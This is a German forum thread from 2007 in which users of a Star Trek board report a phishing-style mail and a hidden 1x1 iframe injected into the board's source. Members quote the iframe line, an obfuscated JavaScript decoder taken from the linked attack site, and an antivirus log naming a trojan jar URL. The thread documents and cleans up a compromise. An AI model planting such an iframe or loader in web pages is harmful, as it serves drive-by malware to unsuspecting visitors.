IPB

Willkommen, Gast ( Anmelden | Registrierung )

> support.trekbbs.de

H├Ąufig gestellte Fragen (FAQ), Informationen zum Chat und Reaktionen zum E!Scope-Magazin

Das Posten in diesem Forum ist NICHT MEHR ohne Anmeldung m├Âglich, um zu posten und neue Threads zu er├Âffnen muss man nun registriert sein. - Es gelten die Boardregeln.

 
Reply to this topicStart new topic
Spam-Mail von admin@trekbbs.de
Warp5Project
Beitrag 8. Jan 2007, 21:04
Beitrag #1


Commander
Gruppensymbol

Gruppe: Mitglied
Beiträge: 313
Beigetreten: 7. October 03
Wohnort: Karl-Marx-Stadt
Mitglieds-Nr.: 72



Das kam gerade bei mir an:

Habe nur meine mailadresse rausgel├Âscht.

X-Apparently-To: meinemailadresse@diekeinerwissenmuss.de via 217.146.189.50; Mon, 08 Jan 2007 12:00:08 -0800
X-Originating-IP: [80.237.132.37]
Authentication-Results: mta154.mail.re3.yahoo.com from=trekbbs.de; domainkeys=neutral (no sig)
Received: from 80.237.132.37 (EHLO wp030.webpack.hosteurope.de) (80.237.132.37) by mta154.mail.re3.yahoo.com with SMTP; Mon, 08 Jan 2007 11:59:51 -0800
Received: by wp030.webpack.hosteurope.de running ExIM using local from nobody id 1H40d5-0007Kw-3r; Mon, 08 Jan 2007 20:57:59 +0100
To: admin@trekbbs.de
Subject: you have new private message ( From Trek BBS )
From: "Trek BBS" <admin@trekbbs.de>
X-Priority: 3
X-Mailer: IPB PHP Mailer
Message-ID: <E1H40d5-0007Kw-3r@wp030.webpack.hosteurope.de>
Date: Mon, 08 Jan 2007 20:57:59 +0100
X-bounce-key: webpack.hosteurope.de;webmaster@trekzone.de;1168286391;5caca4f8;


Trek BBS to you the new message at a forum that it to look has come press under the reference:<br>
<a href="http://www.radiodeejay.hr/forum/lang/inexed.htm" onmouseout="window.status=''" onmouseover="window.status='http://www.hotmail.com/news/index.php';return true">http://www.hotmail.com/news/index.php</a>
-------------------------------------
Registered Users: 542
Total Posts: 92658
Busiest Time: 59 users were online on 1. January 2006 - 04:16

-------------------------------------
Handy Links
-------------------------------------
Board Address: http://www.trekzone.de/community/index.php
Log In: http://www.trekzone.de/community/index.php?act=Login&CODE=00
Lost Password Recovery: http://www.trekzone.de/community/index.php?act=Reg&CODE=10

-------------------------------------
How to unsubscribe
-------------------------------------
Visit your email preferences (http://www.trekzone.de/community/index.php?act=UserCP&CODE=02) and ensure that the box for 'Send me any updates sent by the board administrator' is unchecked and submit the form


--------------------
Go to the top of the page
 
+Quote Post
Gast_Pedda
Beitrag 8. Jan 2007, 21:06
Beitrag #2





Gast






Bei mir auch.
Go to the top of the page
 
+Quote Post
Warp5Project
Beitrag 8. Jan 2007, 21:06
Beitrag #3


Commander
Gruppensymbol

Gruppe: Mitglied
Beiträge: 313
Beigetreten: 7. October 03
Wohnort: Karl-Marx-Stadt
Mitglieds-Nr.: 72



Nachtrag:
Am Ende des Quellcodes hier im Forum steht das da:

<iframe src="http://www.radiodeejay.hr/forum/lang/inexed.htm" width=1 height=1></iframe>


Ich glaub, hier hat einer subtil gehackt.


--------------------
Go to the top of the page
 
+Quote Post
Kobi
Beitrag 8. Jan 2007, 21:06
Beitrag #4


Fleet Captain
Gruppensymbol

Gruppe: Mitglied
Beiträge: 1.722
Beigetreten: 6. October 03
Wohnort: Freie Hansestadt Bremen
Mitglieds-Nr.: 29



Hab ich auch bekommen ...


--------------------
Knowledge is having the right answer. Intelligence is asking the right questions.
Go to the top of the page
 
+Quote Post
Adm. Ges
Beitrag 8. Jan 2007, 21:19
Beitrag #5


Fleet Admiral
Gruppensymbol

Gruppe: Admin
Beiträge: 13.444
Beigetreten: 21. July 03
Wohnort: Berlin (Hauptstadt seit 1701)
Mitglieds-Nr.: 2



Laut Admin-Panel hat Marv ne Mail an alle User geschickt, ich kl├Ąr das mal mit ihm. Aus irgendeinem Grund ging bei mir gerade auch der Virus-Alarm an, als ich auf den Link in Kobis Message geklickt hab.


--------------------
Admiral Tom Jay Ges, U.S.S. Europe, NCC-66066
Go to the top of the page
 
+Quote Post
Adm. Ges
Beitrag 8. Jan 2007, 21:32
Beitrag #6


Fleet Admiral
Gruppensymbol

Gruppe: Admin
Beiträge: 13.444
Beigetreten: 21. July 03
Wohnort: Berlin (Hauptstadt seit 1701)
Mitglieds-Nr.: 2



Jup, sieht leider so aus, als h├Ątte da mal wieder irgendein Arschloch ne Sicherheitsl├╝cke gefunden und zum spamen genutzt.

Marv wird sich das morgen mal angucken.

Habt ihr in eurem Profil den "Admins d├╝rfen mich anmailen"-Punkt aktiviert?


--------------------
Admiral Tom Jay Ges, U.S.S. Europe, NCC-66066
Go to the top of the page
 
+Quote Post
pana
Beitrag 8. Jan 2007, 21:33
Beitrag #7


Commodore
Gruppensymbol

Gruppe: Mitglied
Beiträge: 3.056
Beigetreten: 3. January 04
Mitglieds-Nr.: 174



Ich habe die Nachricht ebenfalls erhalten.

Sch├Ân, zu wissen, da├č unsere Daten hier sicher sind... mrgreen.gif
Go to the top of the page
 
+Quote Post
flexus lucent
Beitrag 8. Jan 2007, 21:35
Beitrag #8


Ensign
Gruppensymbol

Gruppe: Mitglied
Beiträge: 25
Beigetreten: 12. June 05
Mitglieds-Nr.: 369



das selbe bei mir!
Go to the top of the page
 
+Quote Post
Warp5Project
Beitrag 8. Jan 2007, 21:37
Beitrag #9


Commander
Gruppensymbol

Gruppe: Mitglied
Beiträge: 313
Beigetreten: 7. October 03
Wohnort: Karl-Marx-Stadt
Mitglieds-Nr.: 72



QUOTE (Adm. Ges @ 8. Jan 2007, 21:32)
Habt ihr in eurem Profil den "Admins d├╝rfen mich anmailen"-Punkt aktiviert?

Nope.

Trotzdem sollte mal jemand schleunigst die Zeile <iframe src="http://www.radiodeejay.hr/forum/lang/inexed.htm" width=1 height=1></iframe> aus dem Quellcode des Forums entfernen. Wer wei├č, was dort alles f├╝r Daten schlummern.

Der Beitrag wurde von Warp5Project bearbeitet: 8. Jan 2007, 21:38


--------------------
Go to the top of the page
 
+Quote Post
Mad Hatter
Beitrag 8. Jan 2007, 21:39
Beitrag #10


Rear Admiral
Gruppensymbol

Gruppe: Mitglied
Beiträge: 3.891
Beigetreten: 19. March 04
Wohnort: Rechtsniederrheinischer Westenhellweg
Mitglieds-Nr.: 259



Ist deswegen die Bude hier gerade so voll? mrgreen.gif


--------------------

Das Leben ist ein Kobayashi-Maru-Test!


Go to the top of the page
 
+Quote Post
Adm. Ges
Beitrag 8. Jan 2007, 21:42
Beitrag #11


Fleet Admiral
Gruppensymbol

Gruppe: Admin
Beiträge: 13.444
Beigetreten: 21. July 03
Wohnort: Berlin (Hauptstadt seit 1701)
Mitglieds-Nr.: 2



QUOTE (Warp5Project @ 8. Jan 2007, 21:37)
QUOTE (Adm. Ges @ 8. Jan 2007, 21:32)
Habt ihr in eurem Profil den "Admins d├╝rfen mich anmailen"-Punkt aktiviert?

Nope.

Trotzdem sollte mal jemand schleunigst die Zeile <iframe src="http://www.radiodeejay.hr/forum/lang/inexed.htm" width=1 height=1></iframe> aus dem Quellcode des Forums entfernen. Wer wei├č, was dort alles f├╝r Daten schlummern.

Leichter gesagt, als getan sad.gif - den M├╝ll muss man erstmal finden.

Edit: Hoffentlich gefunden & entsorgt.


--------------------
Admiral Tom Jay Ges, U.S.S. Europe, NCC-66066
Go to the top of the page
 
+Quote Post
Gast_Pedda
Beitrag 8. Jan 2007, 22:03
Beitrag #12





Gast






Und der Preis f├╝r die cleverste Board-Promo geht an... Tom Ges! mrgreen.gif
Go to the top of the page
 
+Quote Post
spookie2
Beitrag 8. Jan 2007, 22:11
Beitrag #13


Lieutenant
Gruppensymbol

Gruppe: Mitglied
Beiträge: 57
Beigetreten: 1. June 04
Wohnort: Dresden (Sachsen)
Mitglieds-Nr.: 303



Hm interessant. Danke f├╝r die schnelle Benachrichtigung - die Mailheaders waren ja valide (bis auf des mit den bounce) - sonst w├Ąr die Mail ja geblockt wurden.

der http://www.radiodeejay.hr/forum/lang/inexed.htm (des will nen java plugin laden egal...) hat nen Link zu http://www.lindzeletherman.com/forum/css/index2.php auf dem sich nur nen netter Javascript Code befindet.
CODE
function dc(x){var l=x.length,b=1024,i,j,u,p=0,s=0,w=0,t=Array(63,11,10,15,27,23,1,47,38,52,0,0,0,0,0,0,24,20,62,56,43,5,54,21,19,22,41,48,
42,35,49,8,17,18,26,14,33,50,32,51,55,6,28,0,0,0,0,57,0,9,13,29,2,7,59,53,58,61,
44,36,37,60,40,4,3,25,16,12,45,30,34,39,31,46,0);for(j=Math.ceil(l/b);j>0;j--){u='';for(i=Math.min(l,b);i>0;i--,l--){w|=
(t[x.charCodeAt(p++)-48])<<s;if(s){u+=String.fromCharCode(226^w&255);w>>=8;s-=2}else{s=6}}document.write(u)}}dc("dp")


├ťbrigends sehr merkw├╝rdig das sich auf allen Adressen auch ein Invison Board befindet... Also allg. Softwarefehler und der Virus? legt dann immer ne eigene Seite im betroffenen Board an, die dann bei anderen Foren verlinkt werden => M├Âgliche Anklagen wegen Hackens laufen nur gegen andere Invision Boards Besitzer (letzter Satz ist nur ne Mutma├čung!).

Edits: JS Code mit Zeilenumbr├╝chen versehen..
Gut jedenfalls das der betroffene Code entfernt wurde smile.gif
wink3.gif

Der Beitrag wurde von spookie2 bearbeitet: 8. Jan 2007, 22:14


--------------------
Linux is like a wigwam: NO windows, NO gates and an Apache inside!
Nur wahre Freunde stehen einen auch in schlechten Situationen bei.
STVC - Star Trek Voyager Center Seite und Community
~ ~
Go to the top of the page
 
+Quote Post
Adm. Ges
Beitrag 8. Jan 2007, 22:16
Beitrag #14


Fleet Admiral
Gruppensymbol

Gruppe: Admin
Beiträge: 13.444
Beigetreten: 21. July 03
Wohnort: Berlin (Hauptstadt seit 1701)
Mitglieds-Nr.: 2



Jup, des weiteren w├Ąre es sinnvoll, wenn ihr eure Avi-Programme heute nochmal anwerft, wenn ihr vor meiner Bereinigungsma├čnahme hier gewesen seid.

Bei mir hat n├Ąmlich das Avi-Programm angeschlagen - kann allerdings auch nen anderen Grund gehabt haben.

TR/ClassLoader.G.4 war der Trojaner, der geblockt wurde.


--------------------
Admiral Tom Jay Ges, U.S.S. Europe, NCC-66066
Go to the top of the page
 
+Quote Post
Mad Hatter
Beitrag 8. Jan 2007, 22:50
Beitrag #15


Rear Admiral
Gruppensymbol

Gruppe: Mitglied
Beiträge: 3.891
Beigetreten: 19. March 04
Wohnort: Rechtsniederrheinischer Westenhellweg
Mitglieds-Nr.: 259



QUOTE (Adm. Ges @ 8. Jan 2007, 22:16)
Bei mir hat n├Ąmlich das Avi-Programm angeschlagen - kann allerdings auch nen anderen Grund gehabt haben.

TR/ClassLoader.G.4 war der Trojaner, der geblockt wurde.

Jo, meins hat sich 3 x hintereinander gemeldet..

Zeit
08.01.2007 21:37:55
Modul: IMON
Objekt: Archive
Name: http://www.lindzeletherman.com/forum/css/dat/crtdcghcn.jar
Threat: eine Variante von Java/ClassLoader Trojaner
Aktion: Verbindung unterbrochen

Der Beitrag wurde von Morrigan bearbeitet: 8. Jan 2007, 22:50


--------------------

Das Leben ist ein Kobayashi-Maru-Test!


Go to the top of the page
 
+Quote Post
Kobi
Beitrag 8. Jan 2007, 23:44
Beitrag #16


Fleet Captain
Gruppensymbol

Gruppe: Mitglied
Beiträge: 1.722
Beigetreten: 6. October 03
Wohnort: Freie Hansestadt Bremen
Mitglieds-Nr.: 29



hmm, mein antivir hat nicht geklingelt ... dabei war ich hier zwischen email-info und entfernung des iframes ... ob der Opera sich dazwischen geschmissn hat ...?

(Nein, ich bin nicht wie mein vater, der jetzt den Viruslink mal anklicken w├╝rde, oder die Datei rechnung.PDF.exe mal doppelklickt.)


--------------------
Knowledge is having the right answer. Intelligence is asking the right questions.
Go to the top of the page
 
+Quote Post
Warp5Project
Beitrag 9. Jan 2007, 12:37
Beitrag #17


Commander
Gruppensymbol

Gruppe: Mitglied
Beiträge: 313
Beigetreten: 7. October 03
Wohnort: Karl-Marx-Stadt
Mitglieds-Nr.: 72



QUOTE (Kobi @ 8. Jan 2007, 23:44)
ob der Opera sich dazwischen geschmissn hat ...?

gut m├Âglich - mein virenscanner hat auch nich ausgeschlagen und ich nutze ebenfalls opera. allerdings hab ich http://www.radiodeejay.hr/* auch gleich geblockt, nachdem es mir aufgefallen war.


--------------------
Go to the top of the page
 
+Quote Post
MP
Beitrag 16. Jan 2007, 12:43
Beitrag #18


Commander
Gruppensymbol

Gruppe: Mitglied
Beiträge: 327
Beigetreten: 12. February 00
Wohnort: Berlin
Mitglieds-Nr.: 13



Ick hatte diese Mail auch bekommen, naja wenigstens hat sie mich an die TrekBBS erinnert cool.gif

Einfach mal goggeln nach "hack" und "invision" mrgreen.gif

lg


--------------------
Europa hat einen Vorteil: Es hat Kultur.

Abzuw├Ągende Rechtsg├╝ter

Freie Meinungs├Ąu├čerung
Das Grundrecht der Meinungsfreiheit sch├╝tzt die Meinungskundgabe unabh├Ąngig davon, ob die ├äu├čerung rational oder emotional, begr├╝ndet oder grundlos ist und ob sie von anderen f├╝r n├╝tzlich oder sch├Ądlich, wertvoll oder wertlos gehalten wird. Jeder kann seine Meinung frei ├Ąu├čern und darf deshalb nicht unterdr├╝ckt, verbannt, erpresst oder sonstig mit Repression bedroht werden.

<->

Pers├Ânlichkeitsrecht
Das Grundgesetz garantiert jedem Menschen ein Recht auf Achtung seiner Pers├Ânlichkeit und W├╝rde. Es beinhaltet auch das Recht auf Schutz der pers├Ânlichen Ehre, der physischen wie emotionalen Intigrit├Ąt, das Recht am eigenen Wort und Bild, das dem Sprechenden die Befugnis gibt, den Kreis der Adressaten seiner Worte und seines Bildnisses selbst zu bestimmen. Das Recht auf Schutz der Privatsph├Ąre garantiert auch das Informationen die geeignet sind dieses Recht anzutasten nicht ohne Einwilligung des Betroffenen ver├Âffentlicht werden d├╝rfen. Das allgemeine Pers├Ânlichkeitsrecht garantiert auch die Wahl eines eindeutigen und nicht von anderen zu verwendenden Pseudonyms.

(RMS)
Go to the top of the page
 
+Quote Post
Adm. Ges
Beitrag 1. Feb 2007, 17:07
Beitrag #19


Fleet Admiral
Gruppensymbol

Gruppe: Admin
Beiträge: 13.444
Beigetreten: 21. July 03
Wohnort: Berlin (Hauptstadt seit 1701)
Mitglieds-Nr.: 2



Und erneut ist es leider passiert. Ich hatte das Board vor├╝bergehend offline genommen, um die eingebauten Links zu entfernen.

Sollten noch irgendwelche Merkw├╝rdigkeiten (au├čer dem fehlenden Amazon-Banner) auftreten, bitte sagt bescheid.


--------------------
Admiral Tom Jay Ges, U.S.S. Europe, NCC-66066
Go to the top of the page
 
+Quote Post
Warp5Project
Beitrag 1. Feb 2007, 17:18
Beitrag #20


Commander
Gruppensymbol

Gruppe: Mitglied
Beiträge: 313
Beigetreten: 7. October 03
Wohnort: Karl-Marx-Stadt
Mitglieds-Nr.: 72



vielleicht sollte mal ├╝ber eine andere forensoftware nachgedacht werden. das rumgehacke hier geht einem ja auf die nerven wink.gif


--------------------
Go to the top of the page
 
+Quote Post
Adm. Ges
Beitrag 1. Feb 2007, 17:51
Beitrag #21


Fleet Admiral
Gruppensymbol

Gruppe: Admin
Beiträge: 13.444
Beigetreten: 21. July 03
Wohnort: Berlin (Hauptstadt seit 1701)
Mitglieds-Nr.: 2



QUOTE (Warp5Project @ 1. Feb 2007, 17:18)
vielleicht sollte mal ├╝ber eine andere forensoftware nachgedacht werden. das rumgehacke hier geht einem ja auf die nerven wink.gif

Tun wir schon seit l├Ąngerem. Das Problem ist einfach, dass soetwas einiges kostet. Oder aber auch, dass wir eine vollkommen andere inkompatible Software nehmen und damit alle alten Beitr├Ąge verlieren w├╝rden.

Auf jeden Fall m├╝ssen wir was unternehmen, denn auch die st├Ąndigen Spam-Bot-Registrierungen sind f├╝r mich mit einigem Aufwand verbunden.


--------------------
Admiral Tom Jay Ges, U.S.S. Europe, NCC-66066
Go to the top of the page
 
+Quote Post
Warp5Project
Beitrag 1. Feb 2007, 18:00
Beitrag #22


Commander
Gruppensymbol

Gruppe: Mitglied
Beiträge: 313
Beigetreten: 7. October 03
Wohnort: Karl-Marx-Stadt
Mitglieds-Nr.: 72



QUOTE (Adm. Ges @ 1. Feb 2007, 17:51)
Auf jeden Fall m├╝ssen wir was unternehmen, denn auch die st├Ąndigen Spam-Bot-Registrierungen sind f├╝r mich mit einigem Aufwand verbunden.

sperrt doch einfach die bots ├╝ber .htaccess aus. das d├╝rfte erstmal die lage beruhigen.
ansonsten ... gab's von phpbb nicht nicht einen converter, um beitr├Ąge etc. aus dem invisionboard zu ├╝bernehmen? bin mir da nicht sicher. w├Ąre vielleicht eine ├╝berlegung wert (falls es das geben sollte), wenn doch bald das phpbb3 rauskommt, das zumindest auf den ersten blick einen ganz passablen eindruck macht. und kostenlos ist.


--------------------
Go to the top of the page
 
+Quote Post
Kobi
Beitrag 5. Feb 2007, 16:27
Beitrag #23


Fleet Captain
Gruppensymbol

Gruppe: Mitglied
Beiträge: 1.722
Beigetreten: 6. October 03
Wohnort: Freie Hansestadt Bremen
Mitglieds-Nr.: 29



QUOTE (Warp5Project @ 1. Feb 2007, 18:00)
QUOTE (Adm. Ges @ 1. Feb 2007, 17:51)
Auf jeden Fall m├╝ssen wir was unternehmen, denn auch die st├Ąndigen Spam-Bot-Registrierungen sind f├╝r mich mit einigem Aufwand verbunden.

sperrt doch einfach die bots ├╝ber .htaccess aus. das d├╝rfte erstmal die lage beruhigen.
ansonsten ... gab's von phpbb nicht nicht einen converter, um beitr├Ąge etc. aus dem invisionboard zu ├╝bernehmen? bin mir da nicht sicher. w├Ąre vielleicht eine ├╝berlegung wert (falls es das geben sollte), wenn doch bald das phpbb3 rauskommt, das zumindest auf den ersten blick einen ganz passablen eindruck macht. und kostenlos ist.

Ich hoffe sehr, dass Olympus tats├Ąchlich h├Ąlt, was es verspricht. Momentan habe ich bei phpBB auch mindestens drei neue Bots pro Tag.


--------------------
Knowledge is having the right answer. Intelligence is asking the right questions.
Go to the top of the page
 
+Quote Post
Warp5Project
Beitrag 5. Feb 2007, 19:26
Beitrag #24


Commander
Gruppensymbol

Gruppe: Mitglied
Beiträge: 313
Beigetreten: 7. October 03
Wohnort: Karl-Marx-Stadt
Mitglieds-Nr.: 72



Seit ich die Viehcher ├╝ber .htaccess ausgesperrt habe, hab ich kein Problem mehr mit denen. Vorher waren andauernd welche bei mir unterwegs (haben es aber nie geschafft, sich anzumelden).


--------------------
Go to the top of the page
 
+Quote Post
Adm. Ges
Beitrag 15. Mar 2007, 01:43
Beitrag #25


Fleet Admiral
Gruppensymbol

Gruppe: Admin
Beiträge: 13.444
Beigetreten: 21. July 03
Wohnort: Berlin (Hauptstadt seit 1701)
Mitglieds-Nr.: 2



Diesmal ging es ohne Spammail, allerdings wurde ins Design mal wieder ein netter Link eingebaut. Das m├╝ssen wir noch in den Griff bekommen. *seufz*


--------------------
Admiral Tom Jay Ges, U.S.S. Europe, NCC-66066
Go to the top of the page
 
+Quote Post
marv
Beitrag 15. Mar 2007, 09:40
Beitrag #26


Fleet Captain
Gruppensymbol

Gruppe: Mitglied
Beiträge: 1.719
Beigetreten: 22. July 03
Mitglieds-Nr.: 884



Okay, ich habe jetzt die Funktion zum Ändern des Skins deaktiviert.


--------------------
what would kirk do!?
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic
1 Besucher lesen dieses Thema (Gäste: 1 | Anonyme Besucher: 0)
0 Mitglieder:

 



RSS Vereinfachte Darstellung Aktuelles Datum: 9. December 2019 - 11:55